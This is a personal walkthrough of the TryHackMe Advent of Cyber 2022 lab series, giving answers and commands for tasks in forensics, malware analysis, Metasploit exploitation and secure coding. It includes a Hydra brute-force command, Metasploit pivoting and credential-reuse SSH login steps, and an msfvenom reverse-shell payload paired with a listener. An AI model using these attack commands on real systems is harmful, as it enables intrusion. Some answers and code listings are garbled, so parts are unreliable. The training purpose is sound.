Tilak Khatri
Advent Cyber 2022 Writeup
Task 6 [Day 1] Frameworks | Someone’s coming to town!
NIST Cybersecurity Framework : The Cybersecurity Framework (CSF) was developed by the National Institute of Standards and Technology (NIST), and it provides detailed guidance for organizations to manage and reduce cybersecurity risk.
The framework focuses on five essential functions: Identify -> Protect -> Detect -> Respond -> Recover.
With these functions, the framework allows organizations to prioritize their cybersecurity investments and engage in continuous improvement towards a target cybersecurity profile.
Task 7 [Day 2] Log Analysis | Santa’s Naughty & Nice Log
1.Use the ls command to list the files present in the current directory. How many log files are present?
Ans: 2
2. Elf McSkidy managed to capture the logs generated by the web server. What is the name of this log file?
Again use ls to see.
Ans: webserver.log
3. Begin investigating the log file from question #3 to answer the following questions.
4. On what day was Santa’s naughty and nice list stolen?
cat webserver.log | grep <check_each_day>
Ans: friday
5. What is the IP address of the attacker?
From log file
Ans: 10.10.249.191
6. What is the name of the important list that the attacker stole from Santa?
cat webserver.log | grep santa
Ans: santaslist.txt
7. Look through the log files for the flag. The format of the flag is: THM{}
grep -r "THM"
Task 8 [Day 3] OSINT | Nothing escapes detective McRed
1.What is the name of the Registrar for the domain santagift.shop?
Whois santagift.shop
Ans: Namecheap Inc
2. Find the website’s source code (repository) on github.com and open the file containing sensitive credentials. Can you find the flag?
Go to github.com
search for santagift.shop
Ans: {THM_OSINT_WORKS}
3. What is the name of the file containing passwords?
Ans: config.php
4. What is the name of the QA server associated with the website?
use ctrl+f and type “qa” we will get
Ans: qa.santagift.shop
5. What is the DB_PASSWORD that is being reused between the QA and PROD environments?
Same as above.
Ans:S@nta2022
Task 9 [Day 4] Scanning Scanning through the snow
During the investigation of the downloaded GitHub repo (OSINT task), elf Recon McRed identified a URL qa.santagift.shop that is probably used by all the elves with admin privileges to add or delete gifts on the Santa website. The website has been pulled down for maintenance, and now Recon McRed is scanning the server to see how it's been compromised. Can you help McRed scan the network and find the reason for the website compromise?
For scanning I am using nmap you can go with nikto
nmap -sC -sV -Pn <Machine_Ip>
What is the name of the HTTP server running on the remote host?
Apache
What is the name of the service running on port 22 on the QA server?
ssh
What flag can you find after successfully accessing the Samba service?
Task 10 [Day 5] Brute-Forcing He knows when you're awake
Enumerate the Machine using nmap
he terminal window below shows that we have two listening services, SSH and VNC. Let’s see if we can discover the passwords used for these two services.
Let’s Exploit!!
Use Hydra to find the VNC password of the target with the IP address MACHINE_IP. What is the password?
Let’s use hydra to Crack the Password!!
Hydra is a brute-forcing tool that helps penetration testers and ethical hackers crack the passwords of network services
VNC Servers do not need a Username to Crack with Hydra. So We are giving the Default Password list rockyou.txt and the server address
syntax:
hydra -l username -P wordlist.txt server service
Ans: 1q2w3e4r
Using a VNC client on the AttackBox, connect to the target of the IP address MACHINE_IP. What is the flag written on the target’s screen?
We found the Password, so let’s try Connecting the Machine with the Password
Open Connections in Linux and Type the IP of the Machine
Enter Ip address of machine and password we will get this.
Task 11 [Day 6] Email Analysis | It’s beginning to look a lot like phishing
What is the email address of the sender?
ans: chief.elf@santaclaus.thm>
What is the return address? ans: murphy.evident@bandityeti.thm
On whose behalf was the email sent? ans: Chief elf
What is the X-spam score? ans: 3
What is hidden in the value of the Message-ID field?
Visit the email reputation check website provided in the task. What is the reputation result of the sender's email address? Open the Website emailrep Ans: Risky
Check the attachments. What is the filename of the attachment? Ans: Division_of_labour-Load_share_plan.doc
What is the hash value of the attachment?
[Use this Analyser to Analye the .eml File](<https://eml-analyzer.herokuapp.com/>)
Visit the Virus Total website and use the hash value to search. Navigate to the behavior section. What is the second tactic marked in the Mitre ATT&CK section? Open Virustotal and Search for the hash
Ans: defense evasion
Visit the InQuest website and use the hash value to search.
What is the subcategory of the file?
Open Inquest and Click Indicator Lookup and Search with the Hash
Ans: macro_hunter
Task12[Day 7] CyberChef Maldocs roasting on an open fire
In this task we will learn about CyberChef. CyberChef is a web-based application - used to slice, dice, encode, decode, parse and analyze data or files.
1. What is the version of CyberChef found in the attached VM?
2. How many recipes were used to extract URLs from the malicious doc?
Following are lists:
Strings('Single byte',256,'All printable chars (A)',false,false,false) 2Find_/Replace({'option':'Regex','string':'[\\[\\]\\n]'},'',true,false,true,false) Drop_bytes(0,381,false) From_Base64('A-Za-z0-9+/=',true,false) Decode_text('UTF-16LE (1200)') Find_/Replace({'option':'Regex','string':'[\'()+\'"`]'},'',true,false,true,false) Find/Replace({'option':'Simple string','string':']b2H'},'http',true,false,true,false) Extract_URLs(true,false,false) Split('@','\\n') Defang_URL(true,true,true,'Valid domains and full URLs')
Total: 10
3. We found a URL that was downloading a suspicious file; what is the name of that malware?
<https://cdn.bandityeti.thm/files/mysterygift.exe>
Ans: mysterygift.exe
4. What is the last defanged URL of the bandityeti domain found in the last step?
Ans: hxxps[://]cdn[.]bandityeti[.]THM/files/index/
5. What is the ticket found in one of the domains? (Format: Domain/<GOLDEN_FLAG>)
Total found: 1
hxxps[://]cdn[.]bandityeti[.]thm/files/mysterygift[.]exe
hxxps[://]google[.]com/
hxxps[://]www[.]secretSanta[.]THM/Goldenticket/THM_MYSTERY_FLAG
hxxps[://]cdn[.]bandityeti[.]THM/files/index/
Ans: THM_MYSTERY_FLAG
Task 13 [Day 8] Smart Contracts | Last Christmas I gave you my ETH
Learning Objectives
- Explain what smart contracts are, how they relate to the blockchain, and why they are important.
- Understand how contracts are related, what they are built upon, and standard core functions.
- Understand and exploit a common smart contract vulnerability.
Task 14 [Day 9] Pivoting | Dock the halls
1. Deploy the attached VM, and wait a few minutes. What ports are open?
use nmap to see open ports.
Ans: 80
2. What framework is the web application developed with?
Ans: laravel
3. What CVE is the application vulnerable to?
search framework version exploit in google you will get exploited cve.
exploit Laravel v8.26.1 (PHP v7.4.30)
Ans: CVE-2021-3129
4. What command can be used to upgrade the last opened session to a Meterpreter session?
Ans: sessions -u -1
5. What file indicates a session has been opened within a Docker container?
A common way to tell if a compromised application is running in a Docker container is to verify the existence of a /.dockerenv file at the root directory of the filesystem.
Ans: /.dockerenv
6. What file often contains useful credentials for web applications?
Ans: .env
7. What database table contains useful credentials?
Ans: users
8. What is Santa’s password?
use auxiliary/admin/postgres/postgres_sql
run postgres://postgres:postgres@<MACHINE_IP>/postgres sql='select * from users'
In the previous step, we found Santa’s password.
Ans: p4$$w0rd
9. What ports are open on the host machine?
To further pivot through the private network, we can create a socks proxy within Metasploit:
use auxiliary/server/socks_proxy
run srvhost=127.0.0.1 srvport=9050 version=4a
This will expose a port on the attacker machine that you can use to run other network tools through, such as curl or proxychains
10. What is the root flag?
With the host scanned, we can see that port 22 is open on the host machine. It also is possible that Santa has re-used his password, and it’s possible to SSH into the host machine from the Docker container to grab the flag:
use auxiliary/scanner/ssh/ssh_login
run ssh://santa:p4$$w0rd@{{ip}}
Search for the root.txt file in the root directory for the flag.
following command can be used to upgrade the last opened session to a Meterpreter session
session -i -1
Task 15 [Day 10] Hack a game You’re a mean one, Mr. Yeti
Learning Objectives
- Learn how data is stored in memory in games or other applications.
- Use simple tools to find and alter data in memory.
- Explore the effects of changing data in memory on a running game.
Memory Program
Whenever we execute a program, the CPU will process all data somehow through the computer’s RAM (Random Access Memory). If you think of a videogame, your HP, position, movement speed, and direction are all stored somewhere in memory and updated as needed as the game goes.
We use Cetus, that is a simple browser plugin that works for Firefox and Chrome, allowing you to explore the memory space of Web Assembly games that run in your browser.
What is the Guard’s flag?
When you follow all the steps in the instructions, you will save the memory address as a bookmark.
Note that Cetus uses hexadecimal notation to show you the numbers. If you need to convert the displayed digits to decimals,
hen when the guard asks for the input, type it there and press Enter.
Voila!
Walk towards the guard and talk to him, and you will get the flag as shown below:
2. What is the Yeti’s flag?
To find the next flag, we have to cross the bridge. To accomplish this, we must find our HP value in the memory and alter it.
Start with a differential search, and don’t give any value as input.
You can run a second search using the LT operator without setting a value to search:
Try to get damaged by moving towards the snowballs.
You could do another search with the GT operator with no value again.
Finally, after following instruction mentioned in lab. I did this task.
Task 16 [Day 11] Memory Forensics | Not all gifts are nice
What is memory Forensics?
- Memory forensics is the analysis of the volatile memory that is in use when a computer is powered on.
- Computers use dedicated storage devices called Random Access Memory (RAM) to remember what is being performed on the computer at the time. RAM is extremely quick and is the preferred method of storing and accessing data.
- *Volatility is ****a powerful tool used for analyzing memory dumps on Linux, Mac, and ***Windows systems.
1. What is the Windows version number that the memory image captured?
Scan the Image for Information Gathering Purposes!! By using the Below Command,
python3 vol.py -f workstation.vmem windows.info
Ans: 10
2. What is the name of the binary/gift that secret Santa left?
By using Below Command,
python3 vol.py -f workstation.vmem windows.pslist
windows.pslist: This plugin lists all of the processes that were running at the time of the capture.
Ans: mysterygift.exe
3. What is the Process ID (PID) of this binary?
Look above screenshot
Ans: 2040
4. Dump the contents of this binary. How many files are dumped?
Now Lets dump the Files Worked on the PID by Using the Below Command,
python3 vol.py -f workstation.vmem windows.dumpfiles --pid 2040
Count lines
Ans: 16
Task 17 [Day 12] Malware Analysis | Forensic McBlue to the REVscue!
In this task we will learn about malware analysis.
Learning Objectives
- Learn the fundamentals of analyzing malware samples without relying on automated sandbox scanners.
- Learn and understand typical malware behavior and its importance in the incident investigation pipeline.
Two ways to analysis malware
Static: without executing code.
Dynamic: by executing code in safe environment like sandbox.
1. What is the architecture of the malware sample? (32-bit/64-bit)
As you see in the picture below, the architecture of this malware is AMD64, which is 64-bit.
Ans: 65-bit
2. What is the packer used in the malware sample? (format: lowercase)
Analyse above image we will find packe.
Ans: upx
3. What is the compiler used to build the malware sample? (format: lowercase)
apa detects capabilities in executable files. You run it against a PE, ELF, .NET module, or shellcode file and it tells you what it thinks the program can do. For example, it might suggest that the file is a backdoor, is capable of installing services, or relies on HTTP to communicate.
command: capa -vv mysterygift
4. How many MITRE ATT&CK techniques have been discovered attributed to the DISCOVERY tactic?
5. What is the registry key abused by the malware?
Here we want to open the Process Monitor at the Bottom of the Screen
Ans: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
6. What is the value written on the registry key based on the previous question?
From above image, we can see RegSetValue which indicates what value malware has written after creation. After opening it we get our value.
Ans: c:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wishes.bat
7. What are the names of two files created by the malware under the C:\Users\Administrator\ directory? (format: file1,file2 in alphabetical order)
Again, like about search directory as mentioned above, you will get file names.
Ans: test.jpg,wishes.bat
8. What are the two domains wherein malware has initiated a network connection? (format: domain1,domain2 in alphabetical order)
Unclick all filters and choose the third filter — Show Network Activity. ****, Unlike the previous filters, the results are few and can be easily interpreted.
Ans: bestfestivalcompany.thm, virustotal.com
9. Going back to strings inside the malware sample, what is the complete URL used to download the file hosted in the first domain accessed by the malware?
Using the following command, we can extract the URLs in the malware:
mysterygift.exe | grep http://
Ans: http://bestfestivalcompany.thm/favicon.ico
Task 18 [Day 13] Packet Analysis | Simply having a wonderful pcap time
Learning Objectives
- Learn what traffic analysis is and why it still matters.
- Learn the fundamentals of traffic analysis.
- Learn the essential Wireshark features used in case investigation.
- Learn how to assess the patterns and identify anomalies on the network.
- Learn to use additional tools to identify malicious addresses and conduct further analysis.
- Help the Elf team investigate suspicious traffic patterns.
Tools and Website Used For this Task are!!
Wireshark — For Packet Capture and Analysis
Cyberchef Online Version — For Defang
Virustotal.com — To Analyse Hash
1. What is the “Percent Packets” value of the “Hypertext Transfer Protocol”?
_Ans: 0.3
2. Which port number has received more than 1000 packets?
Go to statistics → conversion → tcp
Ans: 3389
3. What is the service name of the used protocol that received more than 1000 packets?
Remote Desktop Protocol (RDP) is a Microsoft proprietary protocol that enables remote connections to other computers, typically over TCP port 3389. It provides network access for a remote user over an encrypted channel.
4. What are the domain names?Enter the domains in alphabetical order and defanged format. (format: domain[.]zzz,domain[.]zzz)
Filter dns then go to each address right click on it go to follow → UDP steam
Ans: bestfestivalcompany[.]thm,cdn[.]bandityeti.thm
6. Which IP address downloaded the executable file?Enter your answer in defanged format.
Ans: 10[.]10[.]29[.]186
7. Which domain address hosts the malicious file?Enter your answer in defanged format.
Right Click on the Packet that uses GET Request to mysterygift.exe and click Follow → http Stream
Ans: cdn[.]bandityeti[.]thm
8. What is the “user-agent” value used to download the non-executable file?
Right-click on the Packet of Non-executable File and Follow the http stream
Ans: Nim httpclient/1.6.8
9. What is the sha256 hash value of the executable file?
Export http file
Click File→Export Objects-> HTTP and save the File as it is
run following command
sha256sum mysterygift.exe
Ans: 0ce160a54d10f8e81448d0360af5c2948ff6a4dbb493fe4be756fc3e2c3f900f
10. What are the connected IP addresses?Enter the IP addressed defanged and in numerical order. (format: IPADDR,IPADDR)
Search the hash value of the executable file on Virustotal.Navigate to the “Behaviour” section.There are multiple IP addresses associated with this file.
Click the Behaviour tab and Scroll below to Find IP
Ans: 20[.]99[.]133[.]109,20[.]99[.]184[.]37,23[.]216[.]147[.]64,23[.]216[.]147[.]76
Task 19 [Day 14] Web Applications | I’m dreaming of secure web apps
We will discuss one of the popular OWASP tops ten vulnerabilities called Insecure Direct Object Reference (IDOR).
Learning Objectives
- Web Applications
- The Open Web Application Security Project (OWASP) Top 10
- IDOR
Start the Firefox Browser and open the URL http://MACHINE_IP:8080. This link should show you a login page. McSkidy has provided us with the following credentials to test the web application:
- Username: mcskidy
- Password: devtest
1. What is the office number of Elf Pivot McRed?
After successfully login
Change/Increment the ID in the URL to find the Elf Pivot McRed user account:
Keep incrementing the ID. When you reach 105, the Elf Pivot McRed user account will appear as shown below:
Ans: 134
2. Not only profile pages but also stored images are vulnerable. Start with a URL of a valid profile image; what is the hidden flag?
Right Click the Image and Click Open Image in new tab and change id of image we will get image which contain flag like below.
Ans: the{close_the_door}
Task 20 [Day 15] Secure Coding | Santa is looking for a Sidekick
In this task we talk about how to handle invalid input.
i.e Input Validation
Insufficient input validation is one of the biggest security concerns for web applications. The issue occurs when user-provided input is inherently trusted by the application. Since user input can also be controlled by an attacker, we can see how this inherent trust can lead to many problems. Several web application vulnerabilities, such as SQL Injection, Cross Site Scripting, and Unrestricted File Upload, stem from the issue of insufficient user input validation. This task will focus on how insufficient input validation can lead to an Unrestricted File Upload vulnerability.****
Learning Objectives
- Input validation of file upload functionality
- Unrestricted file upload vulnerabilities
- Phishing through file uploads
- How to properly secure file upload functionality
Now let’s try uploading an executable file. Change the file type from .pdf to .exe and upload it to the website.
Here is possibility of uploading any types of files.
Let's use Metasploit to generate a malicious CV:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o cv-username.exe
You can then also use the following to create the associated listener in the msfconsole:
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.8.252.51; set LPORT 4444; exploit"
Once we have our CV, we can upload the file again. Once uploaded, give it a few minutes, and one of those elves should be reviewing our CV (It will take a while, and we have to wait):
Hurray! We got access to the server.
Search for mentioned directory and you will get flag.
flag: THM{Naughty.File.Uploads.Can.Get.You.RCE}
4. What defence technique can be implemented to ensure that specific file types can be uploaded?
To ensure that specific file types can be uploaded, we can verify the file extension. This will allow us to limit the type of files that can be uploaded.
Ans: file extension validation
5. What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?
Even though our uploads are stored outside the web root, an attacker could leverage an additional vulnerability, such as file inclusion, to execute the file.
To counter these attempts, we can look to rename uploaded files to random names, making it almost impossible for an attacker to recover their file by name.
Ans: File renaming
6. What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?
There is still the risk of an attacker uploading a malicious file that targets the elves that will review the CVs. Since Santa is a high-value individual, some nation-states might even use specialized exploits found in PDF readers to upload a malicious PDF in the hopes of getting access to remove themselves from Santa’s naughty list!
In order to combat these types of malicious files, we can scan uploaded files for malware. We can install a package such as ClamAV and use it to scan the contents of each uploaded file.
Ans: Malware Scanning
Task 21 [Day 16] Secure Coding | SQLi’s the king, the carolers sing
Learning Objectives
- Understand what SQL is
- Learn how to read PHP code
- How to secure PHP code to prevent SQL injections
To enter the code editor, use the following credentials:
- Username: coder
- Password: coder
1. What is the value of Flag1?
Change the query in the elf.php to the given command just by adding the intval() function:
2. What is the value of Flag2?
Fixing SQLi Using Prepared Statements
Every time a search is done, it gets sent to search-toys.php via the q parameter. If you ask the elves to recheck the application right now, Elf Exploit should have a way to take advantage of a vulnerability in that parameter. If we open search-toys.php in our code editor, we can quickly see that a query is built in lines 4-5:
$query="select * from toys where name like '%".$_GET['q']."%' or description like '%".$_GET['q']."%'";
$toys_rs=mysqli_query($db,$query);
If an attacker somehow injects SQL, PHP will blindly concatenate the injected payload into the query string, and the database will execute it.
note: Prepared statements allow you to separate the syntax of your SQL sentence from the actual parameters used on your WHERE clause. Instead of building a single string by concatenation, you will first describe the structure of your SQL query and use placeholders to indicate the position of your query's parameters. You will then bind the parameters to the prepared statement in a separate function call.
so, we use mysqli_prepare() instead ot mysqli_query()
$query="select * from toys where name like ? or description like ?";
$stmt = mysqli_prepare($db, $query);
Flag2: THM{KodeNRoll}
3. What is the value of Flag3?
We also Have to Change the Parameters here on toys.php
$query="select * from toys where id=".intval($_GET['id']);
Flag3: THM{Are we secure yet?}
4. What is the value of Flag4?
ding Username, Password parameters with a placeholder indicated with a question mark (?) and the rest of them are same as we did on the 2nd Question, We are Adding the username and password parameter to the mysqli_stmt_bind_param method and Executing it!!
1<?php
2require_once("connection.php");
3session_start();
4
5$users_rs=mysqli_stmt_get_result($stmt);
6if(isset($_POST['username']) && isset($_POST['password'])){
7
8$query="select * from users where username=? and password=?";
9$stmt = mysqli_prepare($db, $query);
10mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
11mysqli_stmt_execute($stmt);
12 if(mysqli_num_rows($users_rs)>0)
13 {
14 $_SESSION['username']=$username;
15 echo "<script>window.location='admin.php';</script>";
16 }
17 else
18 {
19 $message="Incorrect username/password found!";
20 echo "<script type='text/javascript'>alert('$message');</script>";
21 }
22}
23HM{SQLi_who???}
24?>Flag4: THM{SQLi_who???}
Task 22 [Day 17] Secure Coding | Filtering for Order Amidst Chaos
After handling unrestricted file uploads and SQLi vulnerabilities, one of crucial thing is validating inputs. For that we use building html5 input validation and Regex.
HTML5’s built-in features help a lot with the validation of user-provided input, minimizing the need to rely on JavaScript for the same objective.
For even more granular control of the input being provided, regular expressions (regex) can be integrated into the mix. Simply use it in the “pattern” attribute within the <input> element and you’re all set.
Tool used.
egrep 'regex_pattern_here' strings → egrep
regex_checker.py → python script
Exercise
We are aware that some structured data are more complex than others, so we have set a specific syntax you may follow to make the exercise simpler. Have fun!
- Filtering for Usernames: Alphanumeric, minimum of 6 characters, maximum of 12 characters, may consist of upper and lower case letters.
- Filtering for Emails: Follows the form "local-part@domain" (without quotation marks); local-part is a random string, and the domain is in the form of "<domainname>.tld". All top-level domains (tld) are ".com"
- Filtering for URLs: Starts with either http or https; some of the URLs have "www", and a TLD should exist.
1. Filtering for Usernames: How many usernames fit the syntax above?
egrep '^[a-zA-Z0-9]{6,12}$' strings
Ans: 8
2. Filtering for Usernames: One username consists of a readable word concatenated with a number. What is it?
From above output find username with number
Ans: User35
3. Filtering for Emails: How many emails fit the syntax above?
egrep '.+@.+\\.com' strings
Ans: 11
4. Filtering for Emails: How many unique domains are there?
Ans: 8
5. Filtering for Emails: What is the domain of the email with the local-part “lewisham44”?
Ans: amg.com
6. Filtering for Emails: What is the domain of the email with the local-part “maxximax”?
Ans: fedfull.com
7. Filtering for Emails: What is the local-part of the email with the domain name “hotmail.com”?
Ans: hussain.volt
8. Filtering for URLs: How many URLs fit the syntax provided?
egrep '^http(s)?.{3}(www)?.+\\..+$' strings
Ans: 16
9. Filtering for URLs: How many of these URLs start with “https”?
Count it.
Ans: 7